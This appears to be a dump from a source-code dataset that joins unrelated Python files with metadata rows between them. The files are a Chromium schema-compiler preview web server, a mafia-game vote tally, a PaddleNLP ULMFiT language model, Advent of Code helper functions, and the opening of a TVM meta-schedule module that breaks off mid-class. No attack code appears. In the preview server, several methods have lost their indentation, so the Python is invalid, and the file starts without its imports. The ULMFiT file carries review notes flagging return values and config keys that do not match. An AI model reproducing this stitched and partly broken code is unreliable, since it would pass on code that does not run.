from cpp_namespace_environment import CppNamespaceEnvironment
from namespace_resolver import NamespaceResolver
class CompilerHandler(BaseHTTPRequestHandler):
"""A HTTPRequestHandler that outputs the result of tools/json_schema_compiler.
"""
  def do_GET(self):
    """Handle a GET request.

    Directories render the three-pane previewer UI; files render the
    compiled .h/.cc output for the corresponding schema.
    """
    parsed_url = urlparse.urlparse(self.path)
    request_path = self._GetRequestPath(parsed_url)
    chromium_favicon = 'http://codereview.chromium.org/static/favicon.ico'
    head = code.Code()
    head.Append('<link rel="icon" href="%s">' % chromium_favicon)
    head.Append('<link rel="shortcut icon" href="%s">' % chromium_favicon)
    body = code.Code()
    try:
      if os.path.isdir(request_path):
        self._ShowPanels(parsed_url, head, body)
      else:
        self._ShowCompiledFile(parsed_url, head, body)
    finally:
      # Always emit a complete HTML document, even if rendering raised —
      # whatever was appended to head/body so far is still sent.
      self.wfile.write('<html><head>')
      self.wfile.write(head.Render())
      self.wfile.write('</head><body>')
      self.wfile.write(body.Render())
      self.wfile.write('</body></html>')
def _GetRequestPath(self, parsed_url, strip_nav=False):
"""Get the relative path from the current directory to the requested file.
"""
path = parsed_url.path
if strip_nav:
path = parsed_url.path.replace('/nav', '')
return os.path.normpath(os.curdir + path)
  def _ShowPanels(self, parsed_url, head, body):
    """Show the previewer frame structure.
    Code panes are populated via XHR after links in the nav pane are clicked.
    """
    # Inline CSS for the three side-by-side panes (nav / .h / .cc).
    (head.Append('<style>')
    .Append('body {')
    .Append(' margin: 0;')
    .Append('}')
    .Append('.pane {')
    .Append(' height: 100%;')
    .Append(' overflow-x: auto;')
    .Append(' overflow-y: scroll;')
    .Append(' display: inline-block;')
    .Append('}')
    .Append('#nav_pane {')
    .Append(' width: 20%;')
    .Append('}')
    .Append('#nav_pane ul {')
    .Append(' list-style-type: none;')
    .Append(' padding: 0 0 0 1em;')
    .Append('}')
    .Append('#cc_pane {')
    .Append(' width: 40%;')
    .Append('}')
    .Append('#h_pane {')
    .Append(' width: 40%;')
    .Append('}')
    .Append('</style>')
    )
    # Only the nav pane is rendered server-side; the h/cc panes start empty.
    body.Append(
    '<div class="pane" id="nav_pane">%s</div>'
    '<div class="pane" id="h_pane"></div>'
    '<div class="pane" id="cc_pane"></div>' %
    self._RenderNavPane(parsed_url.path[1:])
    )
    # The Javascript that interacts with the nav pane and panes to show the
    # compiled files as the URL or highlighting options change.
    body.Append('''<script type="text/javascript">
// Calls a function for each highlighter style <select> element.
function forEachHighlighterStyle(callback) {
  var highlighterStyles =
      document.getElementsByClassName('highlighter_styles');
  for (var i = 0; i < highlighterStyles.length; ++i)
    callback(highlighterStyles[i]);
}
// Called when anything changes, such as the highlighter or hashtag.
function updateEverything() {
  var highlighters = document.getElementById('highlighters');
  var highlighterName = highlighters.value;
  // Cache in localStorage for when the page loads next.
  localStorage.highlightersValue = highlighterName;
  // Show/hide the highlighter styles.
  var highlighterStyleName = '';
  forEachHighlighterStyle(function(highlighterStyle) {
    if (highlighterStyle.id === highlighterName + '_styles') {
      highlighterStyle.removeAttribute('style')
      highlighterStyleName = highlighterStyle.value;
    } else {
      highlighterStyle.setAttribute('style', 'display:none')
    }
    // Cache in localStorage for when the page next loads.
    localStorage[highlighterStyle.id + 'Value'] = highlighterStyle.value;
  });
  // Populate the code panes.
  function populateViaXHR(elementId, requestPath) {
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = function() {
      if (xhr.readyState != 4)
        return;
      if (xhr.status != 200) {
        alert('XHR error to ' + requestPath);
        return;
      }
      document.getElementById(elementId).innerHTML = xhr.responseText;
    };
    xhr.open('GET', requestPath, true);
    xhr.send();
  }
  var targetName = window.location.hash;
  targetName = targetName.substring('#'.length);
  targetName = targetName.split('.', 1)[0]
  if (targetName !== '') {
    var basePath = window.location.pathname;
    var query = 'highlighter=' + highlighterName + '&' +
                'style=' + highlighterStyleName;
    populateViaXHR('h_pane', basePath + '/' + targetName + '.h?' + query);
    populateViaXHR('cc_pane', basePath + '/' + targetName + '.cc?' + query);
  }
}
// Initial load: set the values of highlighter and highlighterStyles from
// localStorage.
(function() {
var cachedValue = localStorage.highlightersValue;
if (cachedValue)
  document.getElementById('highlighters').value = cachedValue;
forEachHighlighterStyle(function(highlighterStyle) {
  var cachedValue = localStorage[highlighterStyle.id + 'Value'];
  if (cachedValue)
    highlighterStyle.value = cachedValue;
});
})();
window.addEventListener('hashchange', updateEverything, false);
updateEverything();
</script>''')
  def _ShowCompiledFile(self, parsed_url, head, body):
    """Show the compiled version of a json or idl file given the path to the
    compiled file.

    The requested extension (.h or .cc) selects which generator runs; the
    result is syntax-highlighted using the highlighter/style query params.
    """
    api_model = model.Model()
    request_path = self._GetRequestPath(parsed_url)
    (file_root, file_ext) = os.path.splitext(request_path)
    (filedir, filename) = os.path.split(file_root)
    namespace_resolver = NamespaceResolver("./",
                                           filedir,
                                           self.server.include_rules,
                                           self.server.cpp_namespace_pattern)
    try:
      # Get main file.
      namespace = namespace_resolver.ResolveNamespace(filename)
      type_generator = cpp_type_generator.CppTypeGenerator(
          api_model,
          namespace_resolver,
          namespace)
      # Generate code
      if file_ext == '.h':
        cpp_code = (h_generator.HGenerator(type_generator)
                    .Generate(namespace).Render())
      elif file_ext == '.cc':
        cpp_code = (cc_generator.CCGenerator(type_generator)
                    .Generate(namespace).Render())
      else:
        self.send_error(404, "File not found: %s" % request_path)
        return
      # Do highlighting on the generated code
      (highlighter_param, style_param) = self._GetHighlighterParams(parsed_url)
      head.Append('<style>' +
                  self.server.highlighters[highlighter_param].GetCSS(style_param) +
                  '</style>')
      body.Append(self.server.highlighters[highlighter_param]
                  .GetCodeElement(cpp_code, style_param))
    except IOError:
      self.send_error(404, "File not found: %s" % request_path)
      return
    except (TypeError, KeyError, AttributeError,
            AssertionError, NotImplementedError) as error:
      # Compiler failures are surfaced in the page body, then re-raised so
      # the full traceback also lands in the server log.
      body.Append('<pre>')
      body.Append('compiler error: %s' % error)
      body.Append('Check server log for more details')
      body.Append('</pre>')
      raise
def _GetHighlighterParams(self, parsed_url):
    """Get the highlighting parameters from a parsed url.

    Returns a (highlighter_name, style_name) pair, defaulting to
    ('pygments', 'colorful') when the query string omits them.
    """
    query_dict = urlparse.parse_qs(parsed_url.query)
    highlighter = query_dict.get('highlighter', ['pygments'])[0]
    style = query_dict.get('style', ['colorful'])[0]
    return (highlighter, style)
def _RenderNavPane(self, path):
    """Renders an HTML nav pane.

    This consists of a select element to set highlight style, and a list of all
    files at |path| with the appropriate onclick handlers to open either
    subdirectories or JSON files.
    """
    html = code.Code()
    # Highlighter chooser.
    html.Append('<select id="highlighters" onChange="updateEverything()">')
    for name, highlighter in self.server.highlighters.items():
        html.Append('<option value="%s">%s</option>' %
                    (name, highlighter.DisplayName()))
    html.Append('</select>')
    html.Append('<br/>')
    # Style for each highlighter.
    # The correct highlighting will be shown by Javascript.
    for name, highlighter in self.server.highlighters.items():
        styles = sorted(highlighter.GetStyles())
        if not styles:
            continue
        html.Append('<select class="highlighter_styles" id="%s_styles" '
                    'onChange="updateEverything()">' % name)
        for style in styles:
            html.Append('<option>%s</option>' % style)
        html.Append('</select>')
        html.Append('<br/>')
    # The files, with appropriate handlers.
    html.Append('<ul>')
    # Make path point to a non-empty directory. This can happen if a URL like
    # http://localhost:8000 is navigated to.
    if path == '':
        path = os.curdir
    # Firstly, a .. link if this isn't the root.
    if not os.path.samefile(os.curdir, path):
        normpath = os.path.normpath(os.path.join(path, os.pardir))
        html.Append('<li><a href="/%s">%s/</a>' % (normpath, os.pardir))
    # Each file under path/
    for filename in sorted(os.listdir(path)):
        full_path = os.path.join(path, filename)
        _, file_ext = os.path.splitext(full_path)
        if os.path.isdir(full_path) and not full_path.endswith('.xcodeproj'):
            html.Append('<li><a href="/%s/">%s/</a>' % (full_path, filename))
        elif file_ext in ['.json', '.idl']:
            # cc/h panes will automatically update via the hash change event.
            html.Append('<li><a href="#%s">%s</a>' %
                        (filename, filename))
    html.Append('</ul>')
    return html.Render()
class PreviewHTTPServer(HTTPServer, object):
    """HTTP server that also carries the compiler configuration shared by
    every request handler: the available syntax highlighters, the schema
    include rules and the C++ namespace pattern."""

    def __init__(self, server_address, handler, highlighters, include_rules,
                 cpp_namespace_pattern):
        super(PreviewHTTPServer, self).__init__(server_address, handler)
        # Stash the compiler configuration where handlers can reach it via
        # self.server.<attr>.
        self.cpp_namespace_pattern = cpp_namespace_pattern
        self.include_rules = include_rules
        self.highlighters = highlighters
if __name__ == '__main__':
    # Command-line entry point: parse options, build the highlighter set and
    # serve until interrupted.
    parser = optparse.OptionParser(
        description='Runs a server to preview the json_schema_compiler output.',
        usage='usage: %prog [option]...')
    parser.add_option('-p', '--port', default='8000',
                      help='port to run the server on')
    parser.add_option('-n', '--namespace', default='generated_api_schemas',
                      help='C++ namespace for generated files. e.g extensions::api.')
    parser.add_option('-I', '--include-rules',
                      help='A list of paths to include when searching for referenced objects,'
                      ' with the namespace separated by a \':\'. Example: '
                      '/foo/bar:Foo::Bar::%(namespace)s')
    (opts, argv) = parser.parse_args()

    def split_path_and_namespace(path_and_namespace):
        # Rules look like "path:namespace"; split on the first ':' only,
        # since C++ namespaces may themselves contain "::".
        if ':' not in path_and_namespace:
            raise ValueError('Invalid include rule "%s". Rules must be of '
                             'the form path:namespace' % path_and_namespace)
        return path_and_namespace.split(':', 1)

    include_rules = []
    if opts.include_rules:
        include_rules = map(split_path_and_namespace,
                            shlex.split(opts.include_rules))

    try:
        print('Starting previewserver on port %s' % opts.port)
        print('The extension documentation can be found at:')
        print('')
        print(' http://localhost:%s/chrome/common/extensions/api' % opts.port)
        print('')

        highlighters = {
            'hilite': hilite_me_highlighter.HiliteMeHighlighter(),
            'none': none_highlighter.NoneHighlighter()
        }
        # Pygments is optional: fall back to the remaining highlighters when
        # the library is not installed.
        try:
            highlighters['pygments'] = pygments_highlighter.PygmentsHighlighter()
        except ImportError as e:
            pass

        server = PreviewHTTPServer(('', int(opts.port)),
                                   CompilerHandler,
                                   highlighters,
                                   include_rules,
                                   opts.namespace)
        server.serve_forever()
    except KeyboardInterrupt:
        # Ctrl-C: close the listening socket before exiting.
        server.socket.close()
| 34.502747 | 80 | 0.644478 |
56b0333e67f7923e809fd921e780ba2ea86bce34 | 466 | py | Python | open_mafia_engine/built_in/lynch_tally.py | open-mafia/open_mafia_engine | 19296748757a4a18d395a940d30aa48aaac9dd7a | [
"Apache-2.0"
] | 9 | 2018-08-19T21:47:00.000Z | 2021-11-30T20:46:09.000Z | open_mafia_engine/built_in/lynch_tally.py | open-mafia/open_mafia_engine | 19296748757a4a18d395a940d30aa48aaac9dd7a | [
"Apache-2.0"
] | 2 | 2021-05-16T00:12:39.000Z | 2021-05-16T18:36:47.000Z | open_mafia_engine/built_in/lynch_tally.py | open-mafia/open_mafia_engine | 19296748757a4a18d395a940d30aa48aaac9dd7a | [
"Apache-2.0"
] | 2 | 2020-11-28T06:13:10.000Z | 2021-05-16T22:23:22.000Z | from typing import List, Optional
from open_mafia_engine.core.all import Actor, GameObject
from .kills import LynchAction
from .voting import Tally
class LynchTally(Tally):
    """Vote tally that lynches the vote leader."""

    def respond_leader(self, leader: GameObject) -> Optional[List[LynchAction]]:
        """Override this for particular behavior."""
        # Only Actors can be lynched; any other leader yields no action.
        if not isinstance(leader, Actor):
            return None
        return [LynchAction(self.game, self, target=leader)]
6184b310214beb2f13b1ef8d9e0dc7412f6405d4 | 10,875 | py | Python | paddlenlp/transformers/ulmfit/modeling.py | akari0216/PaddleNLP | f896be283bbec5096e083859543be451d7ba82c2 | [
"Apache-2.0"
] | null | null | null | paddlenlp/transformers/ulmfit/modeling.py | akari0216/PaddleNLP | f896be283bbec5096e083859543be451d7ba82c2 | [
"Apache-2.0"
] | null | null | null | paddlenlp/transformers/ulmfit/modeling.py | akari0216/PaddleNLP | f896be283bbec5096e083859543be451d7ba82c2 | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
# Copyright 2021 The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import warnings

import paddle
import paddle.nn as nn
import paddle.nn.functional as F

from .. import PretrainedModel, register_base_model
# Public API of this module.
# NOTE: "ULMFiTPretrainingCriterion" was removed from the original list
# because it is never defined in this file, so `from ... import *` raised
# AttributeError on import.
__all__ = [
    "ULMFiTModel",
    "ULMFiTPretrainedModel",
    "ULMFiTForPretraining",
    "ULMFiTForSequenceClassification",
]
def dropout_mask(x, sz, p):
    """Return a dropout mask of size `sz`, with probability `p` to cancel an element.

    The mask is rescaled by 1/(1-p) (inverted dropout) so the expected
    activation magnitude is unchanged. Note: `x` is kept for API
    compatibility with the fastai original but is not otherwise used.
    """
    # Build the keep-probability tensor directly; the original first
    # allocated an uninitialized paddle.empty(shape=sz) tensor only to read
    # back its shape, which is wasted work.
    mask = paddle.full(sz, 1 - p)
    mask = paddle.bernoulli(mask)
    return paddle.divide(mask, paddle.to_tensor(1 - p))
# Cell
class RNNDropout(nn.Layer):
    """Dropout with probability `p` that is consistent on the seq_len dimension.

    One mask is sampled per (batch, feature) position and broadcast across
    the sequence axis, as in AWD-LSTM variational dropout.
    """

    def __init__(self, p=0.5):
        super(RNNDropout, self).__init__()
        self.p = p

    def forward(self, x):
        # Only active during training with a non-zero rate.
        if self.training and self.p != 0.:
            mask_shape = [x.shape[0], 1, *x.shape[2:]]
            return x * dropout_mask(x.detach(), mask_shape, self.p)
        return x
# Cell
class WeightDropout(nn.Layer):
    "A module that wraps another layer in which some weights will be replaced by 0 during training."

    def __init__(self, module, weight_p, layer_names='weight_hh_l0'):
        super(WeightDropout, self).__init__()
        # module: the wrapped layer (expected to be an nn.LSTM here);
        # weight_p: dropout probability applied to its recurrent weights.
        self.module, self.weight_p, self.layer_names = module, weight_p, [
            layer_names
        ]

    def _setweights(self):
        "Apply dropout to the raw weights."
        # dropout: during training, overwrite the recurrent weights with a
        # dropped-out copy. Both the flat parameter name and the cell-level
        # alias are patched so the LSTM kernel sees the new values.
        # NOTE(review): self.layer_names is ignored; only the hard-coded
        # "weight_hh_l0" / "0.cell.weight_hh" keys are patched -- confirm
        # this matches the wrapped module's state-dict layout.
        if self.training:
            old_dict = self.module.state_dict()
            wgt = old_dict["weight_hh_l0"]
            drop_w = nn.functional.dropout(wgt, p=self.weight_p)
            old_dict["weight_hh_l0"] = drop_w
            old_dict["0.cell.weight_hh"] = drop_w
            self.module.set_state_dict(old_dict)

    def forward(self, *args):
        # Refresh the dropped weights before every forward pass, then
        # delegate to the wrapped module. Requires the module-level
        # `import warnings`.
        self._setweights()
        with warnings.catch_warnings():
            # To avoid the warning that comes because the weights aren't flattened.
            warnings.simplefilter("ignore", category=UserWarning)
            res = self.module(*args)
        return res

    def reset(self):
        # Delegate to the wrapped module's reset, if it has one.
        if hasattr(self.module, 'reset'): self.module.reset()

    def _do_nothing(self):
        # Intentional no-op placeholder.
        pass
# Cell
class EmbeddingDropout(nn.Layer):
    """Apply dropout with probability `embed_p` to an embedding layer `emb`.

    Dropout is applied to whole embedding rows (one Bernoulli draw per
    vocabulary entry), matching fastai's AWD-LSTM embedding dropout.
    """

    def __init__(self, emb, embed_p):
        super(EmbeddingDropout, self).__init__()
        self.emb, self.embed_p = emb, embed_p

    def forward(self, words, scale=None):
        if self.training and self.embed_p != 0:
            # One mask value per vocabulary row, broadcast over emb_sz.
            size = (self.emb.weight.shape[0], 1)
            mask = dropout_mask(self.emb.weight.detach(), size, self.embed_p)
            masked_embed = self.emb.weight * mask
        else:
            masked_embed = self.emb.weight
        if scale: masked_embed.mul_(scale)
        # Bug fix: the original unconditionally reset padding_idx to -1 right
        # after the None-check, making the embedding layer's configured
        # padding index dead code; the check now takes effect.
        padding_idx = self.emb._padding_idx
        if padding_idx is None: padding_idx = -1
        return nn.functional.embedding(words.astype("int64"), masked_embed,
                                       padding_idx, self.emb._sparse)
# Cell
def awd_lstm_lm_split(model):
    """Split a RNN `model` in groups for differential learning rates.

    Returns one parameter list per group: one group per
    (rnn, hidden-dropout) pair, plus a final group holding the embedding,
    its dropout wrapper and the decoder head.
    """
    groups = [
        nn.Sequential(rnn, dp)
        for rnn, dp in zip(model[0].rnns, model[0].hidden_dps)
    ]
    groups.append(
        nn.Sequential(model[0].encoder, model[0].encoder_dp, model[1]))
    # Bug fix: the original wrapped `groups` in another list and then called
    # .parameters() on that plain Python list, which raises AttributeError.
    return [list(g.parameters()) for g in groups]
# Cell
# Default hyper-parameters for the AWD-LSTM language model.
awd_lstm_lm_config = {
    'emb_sz': 400,
    'n_hid': 1152,
    'n_layers': 3,
    'pad_token': 1,
    'bidir': False,
    'output_p': 0.1,
    'hidden_p': 0.15,
    'input_p': 0.25,
    'embed_p': 0.02,
    'weight_p': 0.2,
    'tie_weights': True,
    'out_bias': True,
}
# Cell
def awd_lstm_clas_split(model):
    """Split a RNN `model` in groups for differential learning rates.

    Returns one parameter list per group: the embedding (+ its dropout
    wrapper) first, then one group per (rnn, hidden-dropout) pair, then the
    classifier head.
    """
    groups = [
        nn.Sequential(model[0].module.encoder, model[0].module.encoder_dp)
    ]
    groups += [
        nn.Sequential(rnn, dp)
        for rnn, dp in zip(model[0].module.rnns, model[0].module.hidden_dps)
    ]
    groups.append(model[1])
    # Bug fix: the original wrapped `groups` in another list and then called
    # .parameters() on that plain Python list, which raises AttributeError.
    return [list(g.parameters()) for g in groups]
# Cell
# Default hyper-parameters for the AWD-LSTM text classifier (heavier dropout
# than the language-model configuration).
awd_lstm_clas_config = {
    'emb_sz': 400,
    'n_hid': 1152,
    'n_layers': 3,
    'pad_token': 1,
    'bidir': False,
    'output_p': 0.4,
    'hidden_p': 0.3,
    'input_p': 0.4,
    'embed_p': 0.05,
    'weight_p': 0.5,
}
# NOTE: every class and its forward() below should carry documentation.
# Epsilon applied to LayerNorm layers in ULMFiTPretrainedModel.init_weights.
layer_norm_eps = 1e-6
# Configure default model parameters, pretrained-weight download paths, and
# the weight-initialization method.
class ULMFiTPretrainedModel(PretrainedModel):
    """Base class for ULMFiT pretrained models.

    Supplies the registry attributes expected by PaddleNLP's
    `PretrainedModel` plus a shared weight-initialization hook.
    """
    base_model_prefix = "ulmfit"
    model_config_file = "model_config.json"
    # Pretrained weight configurations (name -> init kwargs); none registered yet.
    pretrained_init_configuration = {
    }
    resource_files_names = {"model_state":"model_state.pdparams"}
    # Weights to be uploaded/downloaded (name -> URL); none registered yet.
    pretrained_resource_files_map = {
    }

    def init_weights(self, layer):
        """Initialize the weights."""
        # Linear/Embedding weights: normal init with the configured std
        # (taken from this model or from the wrapped base model's config);
        # LayerNorm layers: only reset epsilon.
        if isinstance(layer, (nn.Linear, nn.Embedding)):
            layer.weight.set_value(
                paddle.tensor.normal(
                    mean=0.0,
                    std=self.initializer_range
                    if hasattr(self, "initializer_range") else self.ulmfit.config[
                        "initializer_range"],
                    shape=layer.weight.shape))
        elif isinstance(layer, nn.LayerNorm):
            layer._epsilon = layer_norm_eps
# Core model implementation: the AWD-LSTM backbone, exposed here as ULMFiTModel.
@register_base_model
class ULMFiTModel(ULMFiTPretrainedModel):
    "AWD-LSTM inspired by https://arxiv.org/abs/1708.02182"

    # Uniform init range for the embedding matrix.
    initrange = 0.1

    def __init__(self,
                 vocab_sz,
                 emb_sz,
                 n_hid,
                 n_layers,
                 pad_token=1,
                 hidden_p=0.2,
                 input_p=0.6,
                 embed_p=0.1,
                 output_p=0.1,
                 weight_p=0.5,
                 bidir=False,
                 tie_weights=False,
                 bias=True):
        """Build the embedding, stacked weight-dropped LSTMs and dropouts.

        vocab_sz/emb_sz/n_hid/n_layers size the network; the *_p arguments
        are the dropout probabilities of the AWD-LSTM recipe. `output_p`,
        `tie_weights` and `bias` are accepted for config compatibility but
        not used inside this backbone.
        """
        super(ULMFiTModel, self).__init__()
        self.emb_sz = emb_sz
        self.n_hid = n_hid
        self.n_layers = n_layers
        self.pad_token = pad_token
        # Current batch size; hidden state is rebuilt lazily when it changes.
        self.bs = 1
        self.n_dir = 2 if bidir else 1
        self.encoder = nn.Embedding(vocab_sz, emb_sz,
                                    padding_idx=pad_token)  # pad_token
        self.encoder_dp = EmbeddingDropout(self.encoder, embed_p)
        # The last LSTM projects back to emb_sz (so a decoder could tie its
        # weights); intermediate layers use n_hid.
        self.rnns = nn.LayerList([
            self._one_rnn(emb_sz if l == 0 else n_hid,
                          (n_hid if l != n_layers - 1 else emb_sz) //
                          self.n_dir, bidir, weight_p, l)
            for l in range(n_layers)
        ])
        self.encoder.weight.set_value(
            paddle.uniform(shape=self.encoder._size,
                           min=-self.initrange,
                           max=self.initrange))
        self.input_dp = RNNDropout(input_p)
        self.hidden_dps = nn.LayerList(
            [RNNDropout(hidden_p) for l in range(n_layers)])
        self.embed_p = embed_p
        self.reset()

    def forward(self, inp, from_embeds=False):
        """Run the stacked LSTMs over `inp`.

        `inp` holds token ids of shape (bs, sl), or embeddings of shape
        (bs, sl, emb_sz) when `from_embeds` is True. Hidden state is carried
        across calls (truncated BPTT) and detached after every step.
        """
        bs, sl = inp.shape[:2] if from_embeds else inp.shape
        if bs != self.bs: self._change_hidden(bs)
        if not from_embeds:
            inp = self.encoder_dp(inp)
        output = self.input_dp(inp)
        new_hidden = []
        for l, (rnn, hid_dp) in enumerate(zip(self.rnns, self.hidden_dps)):
            output, new_h = rnn(output, self.hidden[l])
            # Detach so gradients do not flow across batch boundaries.
            new_hidden.append((new_h[0].detach(), new_h[1].detach()))
            # Hidden dropout between layers, but not after the last one.
            if l != self.n_layers - 1: output = hid_dp(output)
        self.hidden = new_hidden
        return output

    def _change_hidden(self, bs):
        # Resize every layer's cached hidden state for the new batch size.
        self.hidden = [
            self._change_one_hidden(l, bs) for l in range(self.n_layers)
        ]
        self.bs = bs

    def _one_rnn(self, n_in, n_out, bidir, weight_p, l):
        "Return one of the inner rnn"
        direct = "bidirectional" if bidir else "forward"
        rnn = nn.LSTM(n_in, n_out, 1, time_major=False, direction=direct)
        # Wrap so the recurrent weights get dropout applied each forward.
        return WeightDropout(rnn, weight_p)

    def _one_hidden(self, l):
        "Return one hidden state"
        nh = (self.n_hid
              if l != self.n_layers - 1 else self.emb_sz) // self.n_dir
        s = paddle.zeros(shape=[self.n_dir, self.bs, nh])
        # (h, c) pair for an LSTM layer, both zero-initialized.
        return (s, s)

    def _change_one_hidden(self, l, bs):
        # Grow with zero padding or shrink by slicing, preserving whatever
        # state already exists for the overlapping batch entries.
        if self.bs < bs:
            nh = (self.n_hid
                  if l != self.n_layers - 1 else self.emb_sz) // self.n_dir
            s = paddle.zeros(shape=[self.n_dir, bs - self.bs, nh])
            return tuple(paddle.concat([h, s], axis=1) for h in self.hidden[l])
        if self.bs > bs:
            return (self.hidden[l][0][:, :bs], self.hidden[l][1][:, :bs])
        return self.hidden[l]

    def reset(self):
        "Reset the hidden states"
        [r.reset() for r in self.rnns if hasattr(r, 'reset')]
        self.hidden = [self._one_hidden(l) for l in range(self.n_layers)]
# Sequence-classification head on top of the ULMFiT backbone.
class ULMFiTForSequenceClassification(ULMFiTPretrainedModel):
    """ULMFiT model with dropout plus a linear classifier on the pooled output."""

    def __init__(self, ulmfit, num_classes=2, dropout=None):
        super(ULMFiTForSequenceClassification, self).__init__()
        self.num_classes = num_classes
        self.ulmfit = ulmfit
        # NOTE(review): ULMFiTModel's config is not shown to define
        # "hidden_dropout_prob" or "hidden_size" -- confirm these keys exist.
        self.dropout = nn.Dropout(dropout if dropout is not None else
                                  self.ulmfit.config["hidden_dropout_prob"])
        self.classifier = nn.Linear(self.ulmfit.config["hidden_size"],
                                    self.num_classes)
        self.apply(self.init_weights)

    # Original note (translated): unclear whether position_ids /
    # attention_mask would have any effect, so they are not accepted for now.
    def forward(self, input_ids):
        # NOTE(review): ULMFiTModel.forward returns a single tensor, but two
        # values are unpacked here -- verify the backbone's return contract.
        _, pooled_output = self.ulmfit(
            input_ids)
        pooled_output = self.dropout(pooled_output)
        logits = self.classifier(pooled_output)
        return logits
# Original note (translated): the purpose of this class is not yet clear.
class ULMFiTForPretraining(ULMFiTPretrainedModel):
    """Placeholder for the ULMFiT pretraining head; not implemented yet.

    Declared so the name exported in ``__all__`` resolves. The original body
    was a bare ``None`` expression; replace this stub with a real
    language-model head when pretraining support is added.
    """
| 33.256881 | 106 | 0.580966 |
64a92caec9b9a215b5ee8ac3fd2178b3fbf5b04e | 2,845 | py | Python | src/utils.py | mfrdbigolin/AoC2020 | 18757f0d610ad6a7064a22f94688900208260e48 | [
"MIT"
] | null | null | null | src/utils.py | mfrdbigolin/AoC2020 | 18757f0d610ad6a7064a22f94688900208260e48 | [
"MIT"
] | null | null | null | src/utils.py | mfrdbigolin/AoC2020 | 18757f0d610ad6a7064a22f94688900208260e48 | [
"MIT"
] | null | null | null | #!/bin/python3
# Copyright (C) 2020, 2021 Matheus Fernandes Bigolin <mfrdrbigolin@disroot.org>
# SPDX-License-Identifier: MIT
"""General utilities."""
# Avoid ambiguous namespace with the built-in exit and compile.
from sys import exit as finish
from re import findall
from functools import reduce
from collections import Counter
def open_file(fname):
    """Open <fname> and return its contents."""
    with open(fname, "r") as reader:
        return reader.read()
def arrange(values, dtype=str, sep="\n"):
    """Separate list <values> according to the separator <sep> and return a
    list of <dtype>s. """
    parts = values.split(sep)
    return [dtype(part) for part in parts if part != ""]
def usage_and_exit(is_exit):
    """If <is_exit>, print usage and exit."""
    if not is_exit:
        return
    print("usage: ./dayN INPUT")
    finish(1)
def transfig(ts, dtypes):
    """Typify a tuple of values <ts> according to a tuple of types <dtypes>."""
    return tuple(dtypes[i](value) for i, value in enumerate(ts))


def transfiged(ts, dtypes):
    """Typify a array of tuples <ts> according to a tuple of types <dtypes>."""
    return [transfig(t, dtypes) for t in ts]
def regex(values, dtypes, form):
    """Organize a array of <values> according to a <form> regular
    expression string, return a tuple with the matched with the types
    <dtypes>. """
    organized = []
    for line in values:
        # Only the first match of each line is used.
        first_match = findall(form, line)[0]
        organized.append(transfig(first_match, dtypes))
    return organized
def product(arr):
    """Return the product of a sequence of elements of <arr>."""
    return reduce(lambda running, value: running * value, arr)
def assoc(soc, preds):
    """Map the predicates contained in dictionary <preds> to the
    values contained in dictionary <soc> and return tautology if all
    associations are truthful. """
    checks = []
    for key in soc.keys():
        pred = preds.get(key)
        # Keys without a registered predicate are skipped entirely.
        if pred is not None:
            checks.append(pred(soc.get(key)))
    return all(checks)
def fill(lst, mold, subs):
    """For every <mold> element in <lst>, substitute for the according
    <subs> value (indexically). """
    filled = list(lst)
    next_sub = 0
    for idx, elem in enumerate(lst):
        if elem == mold:
            filled[idx] = subs[next_sub]
            next_sub += 1
    return filled
def dictf(ds):
    """Transform elements from array <ds> into a dictionary, with its head as
    its key and the tail as its values."""
    tail = ds[1:]
    # A list with an empty tail yields an empty dict (zip with no values).
    return dict(zip([ds[0]], [tail] if tail != [] else []))


def merge(d):
    """Cumulatively merge alike elements from <d> (via the | operator)."""
    return reduce(lambda acc, nxt: acc | nxt, d)


def diff(lst):
    """Calculate the pairwise difference between elements of a list <lst>."""
    return [nxt - prev for nxt, prev in zip(lst[1:], lst[:-1])]
def frequency(lst):
    """Return a Counter with the frequency of the elements in <lst>."""
    # Counter's constructor already implements the manual counting loop the
    # original hand-rolled.
    return Counter(lst)
def freqd2(s):
    """Frequency with depth two: sum the per-element frequency Counters."""
    per_element = [frequency(i) for i in s]
    return reduce(lambda total, part: total + part, per_element)
| 25.176991 | 79 | 0.643937 |
f6987ed8bf146199fd17e23e00c348c70b7bac51 | 9,912 | py | Python | python/tvm/meta_schedule/integration.py | MasterJH5574/relax | 47da9537eaccb7526801df11069c05fc457c71bd | [
"Apache-2.0"
] | null | null | null | python/tvm/meta_schedule/integration.py | MasterJH5574/relax | 47da9537eaccb7526801df11069c05fc457c71bd | [
"Apache-2.0"
] | null | null | null | python/tvm/meta_schedule/integration.py | MasterJH5574/relax | 47da9537eaccb7526801df11069c05fc457c71bd | [
"Apache-2.0"
] | null | null | null | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""Meta schedule integration with high-level IR"""
from contextlib import contextmanager
from typing import Callable, Dict, List, Optional, Union
from tvm._ffi import register_object
from tvm.ir import IRModule, transform
from tvm.relay import Any
from tvm.relay import Function as RelayFunc
from tvm.relay import vm
from tvm.runtime import NDArray, Object
from tvm.target import Target
from tvm.tir import PrimFunc
from tvm.relax.expr import Function as RelaxFunc
from tvm.relax.utils import tir_partitioner
from . import _ffi_api
from .database import Database
@register_object("meta_schedule.ExtractedTask")
class ExtractedTask(Object):
    """A tuning task extracted from the high-level IR

    Parameters
    ----------
    task_name : str
        The name of the task extracted
    mod : IRModule
        The high-level IR
    target: Target
        Target information
    dispatched : List[IRModule]
        A list of low-level IRs that the high-level IR could potentially dispatch to
    """

    task_name: str
    mod: IRModule
    dispatched: List[IRModule]

    def __init__(
        self,
        task_name: str,
